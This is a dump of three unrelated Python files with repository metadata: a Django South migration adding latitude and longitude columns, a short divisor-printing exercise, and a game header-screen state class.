08edc5ed6c15f5c379aeb4c8505dfa28f008c337
|
/app/whwn/migrations/0025_auto__del_field_team_point__add_field_team_latitude__add_field_team_lo.py
|
38ecdb4a44e1da15902f5a9b76e925d223c3f80e
|
[] |
no_license
|
wehaveweneed/whwn-dep
|
0795ccd55e837493bf345306a7ae4c7a919ebe8a
|
2535c1fe1ae76a36f24a1c3b32b76f72fc59b49d
|
refs/heads/master
| 2021-01-01T18:55:26.662249
| 2013-08-27T05:58:49
| 2013-08-27T05:58:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,657
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Team.point'
# db.delete_column('whwn_team', 'point')
# Adding field 'Team.latitude'
db.add_column('whwn_team', 'latitude',
self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=8, decimal_places=3, blank=True),
keep_default=False)
# Adding field 'Team.longitude'
db.add_column('whwn_team', 'longitude',
self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=8, decimal_places=3, blank=True),
keep_default=False)
# Deleting field 'Item.point'
# db.delete_column('whwn_item', 'point')
# Adding field 'Item.latitude'
db.add_column('whwn_item', 'latitude',
self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=8, decimal_places=3, blank=True),
keep_default=False)
# Adding field 'Item.longitude'
db.add_column('whwn_item', 'longitude',
self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=8, decimal_places=3, blank=True),
keep_default=False)
# Deleting field 'UserProfile.point'
# db.delete_column('whwn_userprofile', 'point')
# Adding field 'UserProfile.latitude'
db.add_column('whwn_userprofile', 'latitude',
self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=8, decimal_places=3, blank=True),
keep_default=False)
# Adding field 'UserProfile.longitude'
db.add_column('whwn_userprofile', 'longitude',
self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=8, decimal_places=3, blank=True),
keep_default=False)
def backwards(self, orm):
# Adding field 'Team.point'
# db.add_column('whwn_team', 'point',
# self.gf('django.contrib.gis.db.models.fields.PointField')(null=True, blank=True),
# keep_default=False)
# Deleting field 'Team.latitude'
db.delete_column('whwn_team', 'latitude')
# Deleting field 'Team.longitude'
db.delete_column('whwn_team', 'longitude')
# Adding field 'Item.point'
# db.add_column('whwn_item', 'point',
# self.gf('django.contrib.gis.db.models.fields.PointField')(null=True, blank=True),
# keep_default=False)
# Deleting field 'Item.latitude'
db.delete_column('whwn_item', 'latitude')
# Deleting field 'Item.longitude'
db.delete_column('whwn_item', 'longitude')
# Adding field 'UserProfile.point'
# db.add_column('whwn_userprofile', 'point',
# self.gf('django.contrib.gis.db.models.fields.PointField')(null=True, blank=True),
# keep_default=False)
# Deleting field 'UserProfile.latitude'
db.delete_column('whwn_userprofile', 'latitude')
# Deleting field 'UserProfile.longitude'
db.delete_column('whwn_userprofile', 'longitude')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'whwn.item': {
'Meta': {'object_name': 'Item'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '3', 'blank': 'True'}),
'longitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '3', 'blank': 'True'}),
'possessor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'quantity': ('django.db.models.fields.PositiveIntegerField', [], {}),
'requested': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'sku': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['whwn.ItemSKU']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'})
},
'whwn.itemcategory': {
'Meta': {'object_name': 'ItemCategory'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'})
},
'whwn.itemsku': {
'Meta': {'unique_together': "(('upc', 'team'),)", 'object_name': 'ItemSKU'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['whwn.ItemCategory']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['whwn.Team']"}),
'upc': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'})
},
'whwn.message': {
'Meta': {'object_name': 'Message'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'contents': ('django.db.models.fields.TextField', [], {'default': "''"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'flagged': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['whwn.Team']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'})
},
'whwn.team': {
'Meta': {'object_name': 'Team'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '3', 'blank': 'True'}),
'longitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '3', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'primary_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'primary_user'", 'null': 'True', 'to': "orm['auth.User']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'})
},
'whwn.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
'email_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '3', 'blank': 'True'}),
'longitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '3', 'blank': 'True'}),
'phone_number': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'phone_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['whwn.Team']", 'null': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
}
}
complete_apps = ['whwn']
|
[
"wes.vetter@gmail.com"
] |
wes.vetter@gmail.com
|
653a3160557c7d216ad359311443175691103686
|
56ba98873ad995551d00a87a7eea6f705dc52e34
|
/prom7.py
|
df50f206cca6c70e91532f0ad33f805533b45f95
|
[] |
no_license
|
xaviermaxd/python_semana8
|
b4fae081b784fc656d3292b73c6b50b50f6abfba
|
1b81e4fec9884619d1d987d131af4e314ce3bd0c
|
refs/heads/main
| 2023-08-24T08:15:48.986623
| 2021-10-21T01:53:10
| 2021-10-21T01:53:10
| 419,546,381
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 117
|
py
|
div = 0
n = int(input("ingrese un numero : "))
while div <= n:
div += 1
if n % div == 0 :
print(div)
|
[
"xavier.mamani@tecsup.edu.pe"
] |
xavier.mamani@tecsup.edu.pe
|
3f070fc5fe457fc3dc932efd097817205702346b
|
b2a0db27a57236a9f2f19a0004decf83fd3cdb10
|
/headertextscreen.py
|
bfcefe8d4a582055a2c7f0bd216c861cb4c35027
|
[] |
no_license
|
ajveitch/mqd
|
0180bbe824d0e5eb1a2cb287194dc5ee9dc8f8db
|
dc1f9ff627eadb2fbd18e439119f6cc1a1e2328d
|
refs/heads/main
| 2023-07-29T15:34:55.464996
| 2021-09-11T15:47:16
| 2021-09-11T15:47:16
| 403,755,390
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,408
|
py
|
from ui import *
from playercontroller import *
from gamerunner import NullState
class HeaderTextScreen(NullState):
def __init__(self, audio, nextState, player, waitTime = 0):
self.nextState = nextState
self.startButton = -1
self.player = player
self.big = Text(96, (255, 192, 0))
self.small = Text(36, (255, 255, 255))
self.waitTime = waitTime
self.currentTime = 0
self.header = ""
self.subHeader = ""
self.audio = audio
def setHeader(self, header):
self.header = header
def setSub(self, subHeader):
self.subHeader = subHeader
def setNextState(self, nextState):
self.nextState = nextState
def update(self, deltaTime):
if self.waitTime > 0:
self.currentTime = self.currentTime + deltaTime
if self.currentTime >= self.waitTime:
return self.nextState
elif self.startButton == 0:
start = self.player.startButton()
if start:
return self.nextState
self.startButton = self.player.startButton()
return self
def draw(self, surface):
self.big.draw(surface, self.header, (400, 200), True)
self.small.draw(surface, self.subHeader, (400, 300), True)
def onEnter(self):
self.audio.MusicPre()
self.startButton = self.player.startButton()
|
[
"ajv-github@erkle.org"
] |
ajv-github@erkle.org
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.